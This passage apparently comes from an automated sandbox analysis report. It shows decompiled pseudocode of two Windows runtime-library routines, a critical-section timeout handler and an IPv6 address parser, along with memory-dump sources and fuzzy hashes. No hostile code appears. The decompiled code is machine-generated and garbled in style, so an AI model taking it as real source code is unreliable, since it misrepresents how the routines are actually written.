                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                            • API String ID: 885266447-871070163
                                                                                                                                                            • Opcode ID: c406b32b12e76be5f93e5dfd67d9afc1f8455365d2592602fa56e92303e13bde
                                                                                                                                                            • Instruction ID: 142490ef021063749e7dfcf1b08d13d78bfc4e4c42957a93bd7de91a2524982d
                                                                                                                                                            • Opcode Fuzzy Hash: c406b32b12e76be5f93e5dfd67d9afc1f8455365d2592602fa56e92303e13bde
                                                                                                                                                            • Instruction Fuzzy Hash: C65118B1650712BBDB25DFA8DC80FA7739AAF54324F114219FD15DB244EB71E8418BA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                            			E021FEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				intOrPtr* _v28;
                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				short _v66;
                                                                                                                                                            				char _v72;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                            				signed int _t40;
                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                            				signed int _t44;
                                                                                                                                                            				void* _t46;
                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                            				signed int _t49;
                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                            				signed char _t67;
                                                                                                                                                            				void* _t72;
                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                            				intOrPtr* _t80;
                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                            				intOrPtr* _t85;
                                                                                                                                                            				void* _t91;
                                                                                                                                                            				void* _t92;
                                                                                                                                                            				void* _t93;
                                                                                                                                                            
                                                                                                                                                            				_t80 = __edi;
                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                            				_t70 = __ecx;
                                                                                                                                                            				_t84 = _a4;
                                                                                                                                                            				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                            					E021EDA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                            					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                            				}
                                                                                                                                                            				_push(0);
                                                                                                                                                            				__eflags = _t38 - 0xffffffff;
                                                                                                                                                            				if(_t38 == 0xffffffff) {
                                                                                                                                                            					_t39 =  *0x22b793c; // 0x0
                                                                                                                                                            					_push(0);
                                                                                                                                                            					_push(_t84);
                                                                                                                                                            					_t40 = E021D16C0(_t39);
                                                                                                                                                            				} else {
                                                                                                                                                            					_t40 = E021CF9D4(_t38);
                                                                                                                                                            				}
                                                                                                                                                            				_pop(_t85);
                                                                                                                                                            				__eflags = _t40;
                                                                                                                                                            				if(__eflags < 0) {
                                                                                                                                                            					_push(_t40);
                                                                                                                                                            					E02213915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                            					asm("int3");
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L21:
                                                                                                                                                            						_t76 =  *[fs:0x18];
                                                                                                                                                            						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                            						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                            						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                            							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                            							_v66 = 0x1722;
                                                                                                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_t76 =  &_v72;
                                                                                                                                                            							_push( &_v72);
                                                                                                                                                            							_v28 = _t85;
                                                                                                                                                            							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                            							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_push(0x10);
                                                                                                                                                            							_push(0x20402);
                                                                                                                                                            							E021D01A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_t43 = _v8;
                                                                                                                                                            							_push(_t80);
                                                                                                                                                            							_push(0);
                                                                                                                                                            							__eflags = _t43 - 0xffffffff;
                                                                                                                                                            							if(_t43 == 0xffffffff) {
                                                                                                                                                            								_t71 =  *0x22b793c; // 0x0
                                                                                                                                                            								_push(_t85);
                                                                                                                                                            								_t44 = E021D1F28(_t71);
                                                                                                                                                            							} else {
                                                                                                                                                            								_t44 = E021CF8CC(_t43);
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t44 - 0x102;
                                                                                                                                                            							if(_t44 != 0x102) {
                                                                                                                                                            								__eflags = _t44;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t44);
                                                                                                                                                            									E02213915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									E02252306(_t85);
                                                                                                                                                            									__eflags = _t67 & 0x00000002;
                                                                                                                                                            									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                            										_t7 = _t67 + 2; // 0x4
                                                                                                                                                            										_t72 = _t7;
                                                                                                                                                            										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                            										__eflags = _t67 - _t67;
                                                                                                                                                            										if(_t67 == _t67) {
                                                                                                                                                            											E021FEC56(_t72, _t76, _t80, _t85);
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									return 0;
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _v24;
                                                                                                                                                            									if(_v24 != 0) {
                                                                                                                                                            										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                            									}
                                                                                                                                                            									return 2;
                                                                                                                                                            								}
                                                                                                                                                            								goto L36;
                                                                                                                                                            							}
                                                                                                                                                            							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                            							_push(_t67);
                                                                                                                                                            							_t46 = E02214FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                            							_push(_t77);
                                                                                                                                                            							E02223F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                            							_t48 =  *_t85;
                                                                                                                                                            							_t92 = _t91 + 0x18;
                                                                                                                                                            							__eflags = _t48 - 0xffffffff;
                                                                                                                                                            							if(_t48 == 0xffffffff) {
                                                                                                                                                            								_t49 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                            							}
                                                                                                                                                            							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                            							_push(_t49);
                                                                                                                                                            							_t50 = _v12;
                                                                                                                                                            							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                            							_push(_t85);
                                                                                                                                                            							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                            							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                            							E02223F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                            							_t53 =  *_t85;
                                                                                                                                                            							_t93 = _t92 + 0x20;
                                                                                                                                                            							_t67 = _t67 + 1;
                                                                                                                                                            							__eflags = _t53 - 0xffffffff;
                                                                                                                                                            							if(_t53 != 0xffffffff) {
                                                                                                                                                            								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                            								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                            							}
                                                                                                                                                            							__eflags = _t67 - 2;
                                                                                                                                                            							if(_t67 > 2) {
                                                                                                                                                            								__eflags = _t85 - 0x22b20c0;
                                                                                                                                                            								if(_t85 != 0x22b20c0) {
                                                                                                                                                            									_t76 = _a4;
                                                                                                                                                            									__eflags = _a4 - _a8;
                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                            										E0225217A(_t71, __eflags, _t85);
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							_push("RTL: Re-Waiting\n");
                                                                                                                                                            							_push(0);
                                                                                                                                                            							_push(0x65);
                                                                                                                                                            							_a8 = _a4;
                                                                                                                                                            							E02223F92();
                                                                                                                                                            							_t91 = _t93 + 0xc;
                                                                                                                                                            							__eflags =  *0x7ffe0382;
                                                                                                                                                            							if( *0x7ffe0382 != 0) {
                                                                                                                                                            								goto L21;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L36;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t40;
                                                                                                                                                            				}
                                                                                                                                                            				L36:
                                                                                                                                                            			}

































                                                                                                                                                            0x021feb99
                                                                                                                                                            0x021fec85
                                                                                                                                                            0x021fec85
                                                                                                                                                            0x021fec85
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0223248D
                                                                                                                                                            • RTL: Re-Waiting, xrefs: 022324FA
                                                                                                                                                            • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 022324BD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                            • API String ID: 0-3177188983
                                                                                                                                                            • Opcode ID: 9f510e41d4062b69817b758a7a1c18bc92591b07a37116183dab6aac376b92aa
                                                                                                                                                            • Instruction ID: fd9c4945d3a2afda7b3c975607d95d0a0b64a98783da9ddad7fd73bb098ed534
                                                                                                                                                            • Opcode Fuzzy Hash: 9f510e41d4062b69817b758a7a1c18bc92591b07a37116183dab6aac376b92aa
                                                                                                                                                            • Instruction Fuzzy Hash: 8241C2B0650305FFDB24DBA8DC88F6A77AAAF44720F108605FA699B2D4D734E941CB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0220FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _t105;
                                                                                                                                                            				void* _t110;
                                                                                                                                                            				char _t114;
                                                                                                                                                            				short _t115;
                                                                                                                                                            				void* _t118;
                                                                                                                                                            				signed short* _t119;
                                                                                                                                                            				short _t120;
                                                                                                                                                            				char _t122;
                                                                                                                                                            				void* _t127;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            				signed int _t136;
                                                                                                                                                            				intOrPtr _t143;
                                                                                                                                                            				signed int _t158;
                                                                                                                                                            				signed short* _t164;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				void* _t170;
                                                                                                                                                            
                                                                                                                                                            				_t158 = 0;
                                                                                                                                                            				_t164 = _a4;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v24 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_t136 = 0;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                            					if(_t167 == _t158) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					_t118 = _v20 - _t158;
                                                                                                                                                            					if(_t118 == 0) {
                                                                                                                                                            						if(_t167 == 0x3a) {
                                                                                                                                                            							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                            								break;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t119 =  &(_t164[1]);
                                                                                                                                                            								if( *_t119 != _t167) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_t143 = 2;
                                                                                                                                                            								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                            								_v28 = 1;
                                                                                                                                                            								_v8 = _t143;
                                                                                                                                                            								_t136 = _t136 + 1;
                                                                                                                                                            								L47:
                                                                                                                                                            								_t164 = _t119;
                                                                                                                                                            								_v20 = _t143;
                                                                                                                                                            								L14:
                                                                                                                                                            								if(_v24 == _t158) {
                                                                                                                                                            									L19:
                                                                                                                                                            									_t164 =  &(_t164[1]);
                                                                                                                                                            									_t158 = 0;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v12 == _t158) {
                                                                                                                                                            									if(_v16 > 4) {
                                                                                                                                                            										L29:
                                                                                                                                                            										return 0xc000000d;
                                                                                                                                                            									}
                                                                                                                                                            									_t120 = E0220EE02(_v24, _t158, 0x10);
                                                                                                                                                            									_t170 = _t170 + 0xc;
                                                                                                                                                            									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                            									_t136 = _t136 + 1;
                                                                                                                                                            									goto L19;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v16 > 3) {
                                                                                                                                                            									goto L29;
                                                                                                                                                            								}
                                                                                                                                                            								_t122 = E0220EE02(_v24, _t158, 0xa);
                                                                                                                                                            								_t170 = _t170 + 0xc;
                                                                                                                                                            								if(_t122 > 0xff) {
                                                                                                                                                            									goto L29;
                                                                                                                                                            								}
                                                                                                                                                            								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                            								goto L19;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L21:
                                                                                                                                                            						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                            							break;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(E0220685D(_t167, 4) == 0) {
                                                                                                                                                            								if(E0220685D(_t167, 0x80) != 0) {
                                                                                                                                                            									if(_v12 > 0) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t127 = 1;
                                                                                                                                                            									_a7 = 1;
                                                                                                                                                            									_v24 = _t164;
                                                                                                                                                            									_v20 = 1;
                                                                                                                                                            									_v16 = 1;
                                                                                                                                                            									L36:
                                                                                                                                                            									if(_v20 == _t127) {
                                                                                                                                                            										goto L19;
                                                                                                                                                            									}
                                                                                                                                                            									_t158 = 0;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_a7 = 0;
                                                                                                                                                            							_v24 = _t164;
                                                                                                                                                            							_v20 = 1;
                                                                                                                                                            							_v16 = 1;
                                                                                                                                                            							goto L19;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t130 = _t118 - 1;
                                                                                                                                                            					if(_t130 != 0) {
                                                                                                                                                            						if(_t130 == 1) {
                                                                                                                                                            							goto L21;
                                                                                                                                                            						}
                                                                                                                                                            						_t127 = 1;
                                                                                                                                                            						goto L36;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t167 >= 0x80) {
                                                                                                                                                            						L7:
                                                                                                                                                            						if(_t167 == 0x3a) {
                                                                                                                                                            							_t158 = 0;
                                                                                                                                                            							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                            								break;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t119 =  &(_t164[1]);
                                                                                                                                                            								if( *_t119 != _t167) {
                                                                                                                                                            									_v8 = _v8 + 1;
                                                                                                                                                            									L13:
                                                                                                                                                            									_v20 = _t158;
                                                                                                                                                            									goto L14;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v28 != 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								_v28 = _v8 + 1;
                                                                                                                                                            								_t143 = 2;
                                                                                                                                                            								_v8 = _v8 + _t143;
                                                                                                                                                            								goto L47;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                            							break;
                                                                                                                                                            						} else {
                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                            							_t158 = 0;
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(E0220685D(_t167, 4) != 0) {
                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					}
                                                                                                                                                            					if(E0220685D(_t167, 0x80) != 0) {
                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                            						if(_v12 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_a7 = 1;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					}
                                                                                                                                                            					goto L7;
                                                                                                                                                            				}
                                                                                                                                                            				 *_a8 = _t164;
                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                            					if(_v12 != 3) {
                                                                                                                                                            						goto L29;
                                                                                                                                                            					}
                                                                                                                                                            					_v8 = _v8 + 1;
                                                                                                                                                            				}
                                                                                                                                                            				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                            					if(_v20 != 1) {
                                                                                                                                                            						if(_v20 != 2) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                            						L65:
                                                                                                                                                            						_t105 = _v28;
                                                                                                                                                            						if(_t105 != 0) {
                                                                                                                                                            							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                            							E021E8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                            							_t110 = 8;
                                                                                                                                                            							E021DDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                            						if(_v16 > 3) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						_t114 = E0220EE02(_v24, 0, 0xa);
                                                                                                                                                            						_t170 = _t170 + 0xc;
                                                                                                                                                            						if(_t114 > 0xff) {
                                                                                                                                                            							goto L29;
                                                                                                                                                            						}
                                                                                                                                                            						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                            						goto L65;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v16 > 4) {
                                                                                                                                                            						goto L29;
                                                                                                                                                            					}
                                                                                                                                                            					_t115 = E0220EE02(_v24, 0, 0x10);
                                                                                                                                                            					_t170 = _t170 + 0xc;
                                                                                                                                                            					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                            					goto L65;
                                                                                                                                                            				} else {
                                                                                                                                                            					goto L29;
                                                                                                                                                            				}
                                                                                                                                                            			}

























                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eca5
                                                                                                                                                            0x0223ec7a
                                                                                                                                                            0x0220fd4a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fd6e
                                                                                                                                                            0x0220fd6e
                                                                                                                                                            0x0220fd71
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fd71
                                                                                                                                                            0x0220fd4a
                                                                                                                                                            0x0220fd21
                                                                                                                                                            0x0221a3a1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0221a3a1
                                                                                                                                                            0x0220fd36
                                                                                                                                                            0x0222200b
                                                                                                                                                            0x02222012
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02222018
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02222018
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0220fd36
                                                                                                                                                            0x0220fe0f
                                                                                                                                                            0x0220fe16
                                                                                                                                                            0x0221a3ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0221a3b3
                                                                                                                                                            0x0221a3b3
                                                                                                                                                            0x0220fe1f
                                                                                                                                                            0x0223ed25
                                                                                                                                                            0x0223ed86
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed91
                                                                                                                                                            0x0223ed95
                                                                                                                                                            0x0223ed95
                                                                                                                                                            0x0223ed9a
                                                                                                                                                            0x0223edad
                                                                                                                                                            0x0223edb3
                                                                                                                                                            0x0223edba
                                                                                                                                                            0x0223edc4
                                                                                                                                                            0x0223edc9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223edcc
                                                                                                                                                            0x0223ed2a
                                                                                                                                                            0x0223ed55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed61
                                                                                                                                                            0x0223ed66
                                                                                                                                                            0x0223ed6e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed7d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed7d
                                                                                                                                                            0x0223ed30
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223ed3c
                                                                                                                                                            0x0223ed43
                                                                                                                                                            0x0223ed4b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000

APIs
Memory Dump Source
• Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
• Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
Similarity
• API ID: __fassign
• String ID:
• API String ID: 3965848254-0
• Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction ID: 6d3a3a06027a703999b558ef3010632a9e5f283ecfd2ba0512e53f874ff237a3
• Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
• Instruction Fuzzy Hash: 0191B371D6020AEEDF34CFD4C9847AEB7B5FF45308F20846AD805A759AEB704685CB91
Uniqueness
Uniqueness Score: -1.00%